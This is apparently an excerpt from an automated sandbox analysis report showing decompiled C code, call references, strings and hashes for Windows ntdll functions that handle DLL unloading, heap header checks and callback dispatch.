API ID: ExclusiveLock$AcquireCriticalNodeReleaseRemoveSection$AlternateDebugEnterFreeHeapLeaveModulePrintResourceTimesUnload
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 2596885168-2283098728
Opcode ID: bc78d217d1caf3abd58f516aa44fb6b480a0325a8aeaf70bfcf82b2086c6eb1d
Instruction ID: cd8cd68353f6e30dc19ffc694915a57f755b143e33965bac5121049a0d760c15
Opcode Fuzzy Hash: bc78d217d1caf3abd58f516aa44fb6b480a0325a8aeaf70bfcf82b2086c6eb1d
Instruction Fuzzy Hash: C151C171205681ABC724DF38C988B2E77B1FF85318F111A2DE561972A2EF70E851EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6AB652A5, Relevance: 24.2, APIs: 16, Instructions: 161
nativememoryfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6AB652A5(char __ecx) {
				char _v20;
				void* _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v60;
				void* __ebx;
				void* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				void* _t102;
				void* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L6AB7EEF0(0x6ac579a0);
					_t104 =  *0x6ac58210;
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E6AB7EB70(_t93, 0x6ac579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E6ABA9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L6AB7EEF0(0x6ac579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E6AB7EB70(0, 0x6ac579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t93 = _t104 + 0xc;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E6AB9F0BF(_t104 + 0xc,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L6AB7EEF0(0x6ac579a0);
									__eflags =  *0x6ac58210 - _t104;
									if( *0x6ac58210 == _t104) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x6ac58210 = _t102;
										 *_t95 =  *((intOrPtr*)(_t102 + 0xc));
										 *((intOrPtr*)(_t95 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
										 *((intOrPtr*)(_t95 + 8)) =  *((intOrPtr*)(_t102 + 4));
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E6ABE4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E6AB7EB70(_t95, 0x6ac579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E6ABA95D0();
											RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t104);
											_t102 = _v40;
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E6ABA95D0();
											RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t104);
											_t102 = _v40;
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E6AB7EB70(_t93, 0x6ac579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E6ABA95D0();
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t104);
										_t102 = _v40;
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t102 + 4)));
										E6ABA95D0();
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E6AB9F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x6ab652a5
0x6ab652ad
0x6ab652b0
0x6ab652b3
0x6ab652b7
0x6ab652ba
0x6ab652bf
0x6ab652c4
0x6ab652cc
0x00000000
0x00000000
0x6ab652ce
0x6ab652d9
0x6ab652dd
0x6ab652e7
0x6ab652f7
0x6ab652f9
0x6ab652fd
0x6abc0dcf
0x6abc0dd5
0x6abc0dd6
0x6abc0dd7
0x6abc0dd8
0x6abc0dd9
0x6abc0dde
0x6abc0ddf
0x6abc0de0
0x6abc0de1
0x6abc0de2
0x6abc0de5
0x6abc0dea
0x6abc0dec
0x6abc0f60
0x6abc0f64
0x6abc0f70
0x6abc0f76
0x6abc0f79
0x6abc0f79
0x00000000
0x6abc0f64
0x6abc0df2
0x6abc0df7
0x6abc0e04
0x6abc0e0d
0x6abc0e10
0x6abc0e1a
0x6abc0e1c
0x6abc0e4c
0x6abc0e52
0x6abc0e61
0x6abc0e67
0x6abc0e6b
0x6abc0e70
0x6abc0e76
0x6abc0ed7
0x6abc0edc
0x6abc0ee0
0x6abc0eea
0x6abc0ef0
0x6abc0ef6
0x6abc0ef9
0x6abc0efe
0x6abc0f01
0x6abc0f01
0x6abc0f0b
0x6abc0f12
0x6abc0f16
0x6abc0f18
0x6abc0f1b
0x6abc0f2c
0x6abc0f31
0x6abc0f31
0x6abc0f35
0x6abc0f39
0x6abc0f3a
0x6abc0f3c
0x6abc0f3f
0x6abc0f50
0x6abc0f55
0x6abc0f55
0x6abc0f59
0x6ab652eb
0x6ab652f1
0x6ab652f1
0x6abc0e7d
0x6abc0e84
0x6abc0e88
0x6abc0e8a
0x6abc0e8d
0x6abc0e9e
0x6abc0ea3
0x6abc0ea3
0x6abc0ea7
0x6abc0eaf
0x6abc0eb3
0x6abc0eb9
0x6abc0ebc
0x6abc0ecd
0x6abc0ecd
0x00000000
0x6abc0eb3
0x6abc0e21
0x6abc0e2b
0x6abc0e2f
0x6abc0e30
0x6abc0e3a
0x6abc0e3f
0x6abc0e41
0x00000000
0x00000000
0x6abc0e47
0x00000000
0x6abc0e47
0x6abc0df9
0x6abc0dfe
0x00000000
0x00000000
0x00000000
0x6abc0dfe
0x6ab65303
0x6ab65307
0x00000000
0x6ab65309
0x00000000
0x6ab65309
0x6ab65307
0x6ab652e9
0x6ab652e9
0x00000000
0x6ab652e9
0x6ab6530e
0x00000000

APIs

RtlEnterCriticalSection.1105(6AC579A0,?,00000000,?), ref: 6AB652BF
RtlLeaveCriticalSection.1105(6AC579A0,6AC579A0,?,00000000,?), ref: 6AB652DD
ZwFsControlFile.1105(00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6AC579A0,6AC579A0,?,00000000,?), ref: 6ABC0DE5
RtlEnterCriticalSection.1105(6AC579A0,6AC579A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6AC579A0,6AC579A0,?,00000000), ref: 6ABC0E6B
RtlLeaveCriticalSection.1105(6AC579A0,6AC579A0,6AC579A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6AC579A0,6AC579A0,?), ref: 6ABC0E7D
ZwClose.1105(00000000,6AC579A0,6AC579A0,6AC579A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6AC579A0,6AC579A0), ref: 6ABC0E8D
RtlFreeHeap.1105(?,00000000,?,00000000,6AC579A0,6AC579A0,6AC579A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 6ABC0E9E
ZwClose.1105(?,6AC579A0,6AC579A0,6AC579A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6AC579A0,6AC579A0), ref: 6ABC0EBC
RtlFreeHeap.1105(?,00000000,6AC579A0,?,6AC579A0,6AC579A0,6AC579A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 6ABC0ECD

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CloseEnterFreeHeapLeave$ControlFile
String ID:
API String ID: 1928194833-0
Opcode ID: 07f3adc3e28b51b84f3e1277437a408afc19c6f596855606deeb1221fe873ce8
Instruction ID: e35106bc46c5ee6b91e0d4d71c45e5f9ad3395d6a2f8a0e0e3c07ead7c7f4e2d
Opcode Fuzzy Hash: 07f3adc3e28b51b84f3e1277437a408afc19c6f596855606deeb1221fe873ce8
Instruction Fuzzy Hash: A351C07010A782AFC721CF68C844B1BBBE4FF40718F11091AF4A587652EF70E8A0E796

Uniqueness

Uniqueness Score: -1.00%

Function 6AC249A4, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00001000,00000004,00000000,?,00000000,?,?,6AC244B7,?), ref: 6AC249DF

Part of subcall function 6ABA9660: LdrInitializeThunk.NTDLL(6ABF18BF,000000FF,00000000,00000000,0000000C,00001000,00000004,6AC40810,0000001C,6ABF1616), ref: 6ABA966A

RtlCompareMemory.1105(?,01000000,?,00000000,?,00000000,?,?,6AC244B7,?), ref: 6AC249FE
memcpy.1105(01000000,?,?,00000000,?,00000000,?,?,6AC244B7,?), ref: 6AC24A0C
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?), ref: 6AC24A42
DbgPrint.1105(HEAP: ,?), ref: 6AC24A4F
DbgPrint.1105(Heap %p - headers modified (%p is %lx instead of %lx),?,HEAP: ,HEAP: ,00000000,?), ref: 6AC24A66
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?), ref: 6AC24ABC
DbgPrint.1105(HEAP: ,?,?,?,?,?,?), ref: 6AC24AC9
DbgPrint.1105( This is located in the %s field of the heap header.,?,?,?,?,?,?), ref: 6AC24ADB

Strings

This is located in the %s field of the heap header., xrefs: 6AC24AD6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 6AC24A61
HEAP[%wZ]: , xrefs: 6AC24A3D, 6AC24AB7
HEAP: , xrefs: 6AC24A4A, 6AC24A5D, 6AC24A5F, 6AC24AC4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$Memory$AllocateCompareInitializeThunkVirtualmemcpy
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 4107597528-336120773
Opcode ID: 58ab19b9add91b3039707e297aacac85b1592f6293ca7af335c703140c4b4dd7
Instruction ID: e666c52f80cbe9776e753294e5de1e3d75f2db3993afaa32e9a3ee9081f70e49
Opcode Fuzzy Hash: 58ab19b9add91b3039707e297aacac85b1592f6293ca7af335c703140c4b4dd7
Instruction Fuzzy Hash: 9F31003A211684EFE310CB98C988F5A73F8FF01728F164165F515AB242EF30A880EA64

Uniqueness

Uniqueness Score: -1.00%

Function 6AB63ACA, Relevance: 21.3, APIs: 14, Instructions: 348
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6AB63ACA(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t197;
				intOrPtr _t200;
				intOrPtr _t206;
				intOrPtr _t209;
				intOrPtr _t217;
				signed int _t224;
				signed int _t226;
				signed int _t229;
				signed int _t230;
				signed int _t233;
				intOrPtr _t238;
				signed int _t246;
				signed int _t249;
				char* _t252;
				intOrPtr _t257;
				signed int _t272;
				intOrPtr _t280;
				intOrPtr _t281;
				signed char _t286;
				signed int _t291;
				signed int _t292;
				intOrPtr _t299;
				intOrPtr _t301;
				signed int _t307;
				intOrPtr* _t308;
				signed int _t309;
				intOrPtr _t312;
				signed int* _t313;
				intOrPtr _t315;
				signed int _t316;
				void* _t317;

				_push(0x84);
				_push(0x6ac3f4d0);
				E6ABBD0E8(__ebx, __edi, __esi);
				_t312 = __edx;
				 *((intOrPtr*)(_t317 - 0x38)) = __edx;
				 *((intOrPtr*)(_t317 - 0x20)) = __ecx;
				_t307 = 0;
				 *(_t317 - 0x74) = 0;
				 *((intOrPtr*)(_t317 - 0x78)) = 0;
				_t272 = 0;
				 *(_t317 - 0x60) = 0;
				 *((intOrPtr*)(_t317 - 0x68)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t197 = __edx + 0x28;
				 *((intOrPtr*)(_t317 - 0x7c)) = _t197;
				 *((intOrPtr*)(_t317 - 0x88)) = _t197;
				E6AB82280(_t197, _t197);
				_t280 =  *((intOrPtr*)(_t312 + 0x2c));
				 *((intOrPtr*)(_t317 - 0x34)) = _t280;
				L1:
				while(1) {
					if(_t280 == _t312 + 0x2c) {
						E6AB7FFB0(_t272, _t307,  *((intOrPtr*)(_t317 - 0x7c)));
						asm("sbb ebx, ebx");
						return E6ABBD130( ~_t272 & 0xc000022d, _t307, _t312);
					}
					_t15 = _t280 - 4; // -4
					_t200 = _t15;
					 *((intOrPtr*)(_t317 - 0x70)) = _t200;
					 *((intOrPtr*)(_t317 - 0x8c)) = _t200;
					 *((intOrPtr*)(_t317 - 0x6c)) = _t200;
					_t308 = 0x7ffe0010;
					_t313 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									 *(_t317 - 0x30) =  *0x6ac58628;
									 *(_t317 - 0x44) =  *0x6ac5862c;
									 *(_t317 - 0x28) =  *_t313;
									 *(_t317 - 0x58) = _t313[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t281 =  *0x7ffe0008;
										__eflags = _t301 -  *_t308;
										if(_t301 ==  *_t308) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t313 = 0x7ffe03b0;
									_t309 =  *0x7ffe03b0;
									 *(_t317 - 0x40) = _t309;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t317 - 0x3c)) = _t206;
									__eflags =  *(_t317 - 0x28) - _t309;
									_t308 = 0x7ffe0010;
								} while ( *(_t317 - 0x28) != _t309);
								__eflags =  *(_t317 - 0x58) - _t206;
							} while ( *(_t317 - 0x58) != _t206);
							 *(_t317 - 0x28) =  *0x6ac5862c;
							__eflags =  *(_t317 - 0x30) -  *0x6ac58628;
							_t308 = 0x7ffe0010;
						} while ( *(_t317 - 0x30) !=  *0x6ac58628);
						__eflags =  *(_t317 - 0x44) -  *(_t317 - 0x28);
					} while ( *(_t317 - 0x44) !=  *(_t317 - 0x28));
					_t315 =  *((intOrPtr*)(_t317 - 0x6c));
					_t307 = 0;
					_t272 =  *(_t317 - 0x60);
					asm("sbb edx, [ebp-0x3c]");
					asm("sbb edx, eax");
					 *(_t317 - 0x28) = _t281 -  *(_t317 - 0x40) -  *(_t317 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x2c]");
					_t209 =  *((intOrPtr*)(_t317 - 0x20));
					_t286 =  *(_t315 + 0x24) &  *(_t209 + 0x18);
					 *(_t317 - 0x40) = _t286;
					__eflags =  *(_t315 + 0x34);
					if( *(_t315 + 0x34) != 0) {
						L37:
						 *((intOrPtr*)(_t317 - 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t317 - 0x34))));
						E6AB9DF4C(_t317 - 0x78, _t315, _t317 - 0x74, _t317 - 0x78);
						_t316 =  *(_t317 - 0x74);
						__eflags = _t316;
						_t280 =  *((intOrPtr*)(_t317 - 0x34));
						if(_t316 != 0) {
							 *0x6ac5b1e0( *((intOrPtr*)(_t317 - 0x78)));
							 *_t316();
							_t280 =  *((intOrPtr*)(_t317 - 0x34));
						}
						_t312 =  *((intOrPtr*)(_t317 - 0x38));
						continue;
					}
					__eflags = _t286;
					if(_t286 == 0) {
						goto L37;
					}
					 *(_t317 - 0x5c) = _t286;
					_t45 = _t317 - 0x5c;
					 *_t45 =  *(_t317 - 0x5c) & 0x00000001;
					__eflags =  *_t45;
					if( *_t45 == 0) {
						L40:
						__eflags = _t286 & 0xfffffffe;
						if((_t286 & 0xfffffffe) != 0) {
							__eflags =  *((intOrPtr*)(_t315 + 0x64)) - _t307;
							if( *((intOrPtr*)(_t315 + 0x64)) == _t307) {
								L14:
								__eflags =  *(_t315 + 0x40) - _t307;
								if( *(_t315 + 0x40) != _t307) {
									__eflags = _t301 -  *(_t315 + 0x4c);
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t299 =  *((intOrPtr*)(_t317 - 0x20));
										__eflags =  *(_t315 + 0x5c) -  *((intOrPtr*)(_t299 + 0x10));
										if( *(_t315 + 0x5c) >=  *((intOrPtr*)(_t299 + 0x10))) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t317 - 0x28) -  *(_t315 + 0x48);
									if( *(_t317 - 0x28) >=  *(_t315 + 0x48)) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *((intOrPtr*)(_t317 + 8)) - _t307;
								if( *((intOrPtr*)(_t317 + 8)) != _t307) {
									__eflags =  *((intOrPtr*)(_t315 + 0x58)) - _t307;
									if( *((intOrPtr*)(_t315 + 0x58)) != _t307) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t317 - 0x24) = _t307;
								 *(_t317 - 0x30) = _t307;
								 *((intOrPtr*)(_t317 - 0x2c)) =  *((intOrPtr*)(_t315 + 0x10));
								_t217 =  *((intOrPtr*)(_t315 + 0xc));
								 *((intOrPtr*)(_t317 - 0x4c)) =  *((intOrPtr*)(_t217 + 0x10));
								 *((intOrPtr*)(_t317 - 0x48)) =  *((intOrPtr*)(_t217 + 0x14));
								 *(_t317 - 0x58) =  *(_t217 + 0x24);
								 *((intOrPtr*)(_t317 - 0x3c)) =  *((intOrPtr*)(_t315 + 0x14));
								 *((intOrPtr*)(_t317 - 0x64)) =  *((intOrPtr*)(_t315 + 0x18));
								 *(_t315 + 0x60) =  *( *[fs:0x18] + 0x24);
								_t224 =  *((intOrPtr*)(_t317 - 0x38)) + 0x28;
								 *(_t317 - 0x94) = _t224;
								_t291 = _t224;
								 *(_t317 - 0x28) = _t291;
								 *(_t317 - 0x90) = _t291;
								E6AB7FFB0(_t272, _t307, _t224);
								_t292 = _t307;
								 *(_t317 - 0x54) = _t292;
								_t226 = _t307;
								 *(_t317 - 0x50) = _t226;
								 *(_t317 - 0x44) = _t226;
								__eflags =  *(_t315 + 0x28);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t229 = 0;
									_t230 = _t229 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t317 - 0x50) = _t230;
									 *(_t317 - 0x44) = _t230;
									__eflags = _t230;
									if(_t230 != 0) {
										goto L17;
									}
									__eflags =  *((intOrPtr*)(_t317 + 8)) - 1;
									if( *((intOrPtr*)(_t317 + 8)) == 1) {
										E6AB82280( *(_t315 + 0x28) + 0x10,  *(_t315 + 0x28) + 0x10);
										_t230 = 1;
										 *(_t317 - 0x50) = 1;
										 *(_t317 - 0x44) = 1;
										goto L17;
									}
									_t233 = _t230 + 1;
									L35:
									 *( *((intOrPtr*)(_t317 - 0x70)) + 0x58) = _t233;
									__eflags = _t292;
									if(_t292 == 0) {
										E6AB82280(_t233,  *(_t317 - 0x28));
									}
									 *(_t315 + 0x60) = _t307;
									goto L37;
								}
								L17:
								__eflags =  *(_t315 + 0x34) - _t307;
								if( *(_t315 + 0x34) != _t307) {
									L26:
									__eflags =  *(_t317 - 0x50);
									if( *(_t317 - 0x50) != 0) {
										_t230 = E6AB7FFB0(_t272, _t307,  *(_t315 + 0x28) + 0x10);
									}
									__eflags =  *(_t317 - 0x30);
									if( *(_t317 - 0x30) == 0) {
										L71:
										_t292 =  *(_t317 - 0x54);
										L34:
										_t233 = _t307;
										goto L35;
									}
									E6AB82280(_t230,  *(_t317 - 0x94));
									_t292 = 1;
									 *(_t317 - 0x54) = 1;
									__eflags =  *(_t317 - 0x24) - 0xc000022d;
									if( *(_t317 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t315 + 0x20) & 0x00000004;
										if(( *(_t315 + 0x20) & 0x00000004) == 0) {
											goto L34;
										}
										_t272 = 1;
										__eflags = 1;
										 *(_t317 - 0x60) = 1;
										E6ABF30AE(_t315,  *(_t317 - 0x24),  *( *((intOrPtr*)(_t317 - 0x20)) + 0x10));
										goto L71;
									}
									__eflags =  *(_t317 - 0x24) - 0xc0000017;
									if( *(_t317 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t315 + 0x1c);
									if( *(_t315 + 0x1c) != 0) {
										_t238 =  *((intOrPtr*)(_t317 - 0x20));
										__eflags =  *((intOrPtr*)(_t238 + 0x10)) -  *(_t315 + 0x1c);
										if( *((intOrPtr*)(_t238 + 0x10)) -  *(_t315 + 0x1c) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t315 + 0x20) & 0x00000004;
										if(( *(_t315 + 0x20) & 0x00000004) != 0) {
											__eflags =  *(_t315 + 0x50) - _t307;
											if( *(_t315 + 0x50) > _t307) {
												 *(_t315 + 0x40) = _t307;
												 *(_t315 + 0x54) = _t307;
												 *(_t315 + 0x48) = _t307;
												 *(_t315 + 0x4c) = _t307;
												 *(_t315 + 0x50) = _t307;
												 *(_t315 + 0x5c) = _t307;
											}
										}
										goto L34;
									}
									L31:
									 *(_t315 + 0x1c) =  *( *((intOrPtr*)(_t317 - 0x20)) + 0x10);
									goto L32;
								}
								 *(_t317 - 0x30) = 1;
								 *((intOrPtr*)(_t317 - 0x80)) = 1;
								 *((intOrPtr*)(_t317 - 0x64)) = E6AB63E80( *((intOrPtr*)(_t317 - 0x64)));
								 *(_t317 - 4) = _t307;
								__eflags =  *(_t317 - 0x5c);
								if( *(_t317 - 0x5c) != 0) {
									_t257 =  *((intOrPtr*)(_t317 - 0x20));
									 *0x6ac5b1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)),  *((intOrPtr*)(_t257 + 0x10)),  *(_t317 - 0x58),  *((intOrPtr*)(_t317 - 0x3c)),  *((intOrPtr*)(_t317 - 0x68)),  *((intOrPtr*)(_t257 + 0x14)));
									 *(_t317 - 0x24) =  *((intOrPtr*)(_t317 - 0x2c))();
								}
								_t246 =  *(_t317 - 0x40);
								__eflags = _t246 & 0x00000010;
								if((_t246 & 0x00000010) != 0) {
									__eflags =  *(_t315 + 0x34) - _t307;
									if( *(_t315 + 0x34) != _t307) {
										goto L21;
									}
									__eflags =  *(_t317 - 0x24);
									if( *(_t317 - 0x24) >= 0) {
										L64:
										 *0x6ac5b1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)), _t307,  *(_t317 - 0x58),  *((intOrPtr*)(_t317 - 0x3c)), _t307, _t307);
										 *((intOrPtr*)(_t317 - 0x2c))();
										 *(_t317 - 0x24) = _t307;
										_t246 =  *(_t317 - 0x40);
										goto L21;
									}
									__eflags =  *(_t315 + 0x20) & 0x00000004;
									if(( *(_t315 + 0x20) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t246 & 0xffffffee;
									if((_t246 & 0xffffffee) != 0) {
										 *(_t317 - 0x24) = _t307;
										 *0x6ac5b1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)),  *((intOrPtr*)(_t317 - 0x3c)), _t246);
										 *((intOrPtr*)(_t317 - 0x2c))();
									}
									_t249 = E6AB87D50();
									__eflags = _t249;
									if(_t249 != 0) {
										_t252 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t252 = 0x7ffe038e;
									}
									__eflags =  *_t252;
									if( *_t252 != 0) {
										_t252 = E6ABF2E14( *( *((intOrPtr*)(_t317 - 0x20)) + 0x10), _t315,  *((intOrPtr*)(_t317 - 0x38)),  *((intOrPtr*)(_t317 - 0x2c)),  *(_t317 - 0x40),  *(_t317 - 0x24),  *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)));
									}
									 *(_t317 - 4) = 0xfffffffe;
									E6AB63E6B(_t252);
									_t230 = E6AB63E80( *((intOrPtr*)(_t317 - 0x64)));
									goto L26;
								}
							}
						}
						__eflags = _t286 & 0x00000010;
						if((_t286 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t315 + 0x1c);
					if( *(_t315 + 0x1c) != 0) {
						__eflags =  *((intOrPtr*)(_t209 + 0x10)) -  *(_t315 + 0x1c);
						if( *((intOrPtr*)(_t209 + 0x10)) -  *(_t315 + 0x1c) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x6ab63aca
0x6ab63acf
0x6ab63ad4
0x6ab63ad9
0x6ab63adb
0x6ab63ae0
0x6ab63ae3
0x6ab63ae5
0x6ab63ae8
0x6ab63aeb
0x6ab63aed
0x6ab63af5
0x6ab63af8
0x6ab63afb
0x6ab63afe
0x6ab63b05
0x6ab63b0a
0x6ab63b0d
0x00000000
0x6ab63b10
0x6ab63b15
0x6ab63b1a
0x6ab63b21
0x6ab63b30
0x6ab63b30
0x6ab63b33
0x6ab63b33
0x6ab63b36
0x6ab63b39
0x6ab63b3f
0x6ab63b47
0x6ab63b4a
0x6ab63b4a
0x6ab63b4f
0x6ab63b4f
0x6ab63b4f
0x6ab63b4f
0x6ab63b4f
0x6ab63b54
0x6ab63b5c
0x6ab63b61
0x6ab63b67
0x6ab63b6f
0x6ab63b6f
0x6ab63b71
0x6ab63b75
0x6ab63b77
0x00000000
0x00000000
0x6ab63e6c
0x6ab63e6c
0x6ab63b7d
0x6ab63b7d
0x6ab63b82
0x6ab63b84
0x6ab63b87
0x6ab63b8a
0x6ab63b8d
0x6ab63b90
0x6ab63b90
0x6ab63b97
0x6ab63b97
0x6ab63ba7
0x6ab63baa
0x6ab63bad
0x6ab63bad
0x6ab63bb7
0x6ab63bb7
0x6ab63bbc
0x6ab63bbf
0x6ab63bc1
0x6ab63bc7
0x6ab63bcd
0x6ab63bd5
0x6ab63bd8
0x6ab63bda
0x6ab63be1
0x6ab63be4
0x6ab63be7
0x6ab63bea
0x6ab63bed
0x6ab63d97
0x6ab63d9c
0x6ab63da8
0x6ab63dad
0x6ab63db0
0x6ab63db2
0x6ab63db5
0x6abc020b
0x6abc0211
0x6abc0213
0x6abc0213
0x6ab63dbb
0x00000000
0x6ab63dbb
0x6ab63bf3
0x6ab63bf5
0x00000000
0x00000000
0x6ab63bfb
0x6ab63bfe
0x6ab63bfe
0x6ab63bfe
0x6ab63c02
0x6ab63dd1
0x6ab63dd1
0x6ab63dd7
0x6abc00c1
0x6abc00c4
0x6ab63c11
0x6ab63c11
0x6ab63c14
0x6abc00cf
0x6abc00d2
0x00000000
0x00000000
0x6abc00d8
0x6abc00e6
0x6abc00e9
0x6abc00ec
0x6abc00ef
0x00000000
0x00000000
0x00000000
0x6abc00f5
0x6abc00dd
0x6abc00e0
0x00000000
0x00000000
0x00000000
0x6abc00e0
0x6ab63c1a
0x6ab63c1a
0x6ab63c1d
0x6ab63e20
0x6ab63e23
0x00000000
0x00000000
0x00000000
0x6ab63e29
0x6ab63c23
0x6ab63c23
0x6ab63c26
0x6ab63c2c
0x6ab63c2f
0x6ab63c35
0x6ab63c3b
0x6ab63c41
0x6ab63c47
0x6ab63c4d
0x6ab63c59
0x6ab63c5f
0x6ab63c62
0x6ab63c68
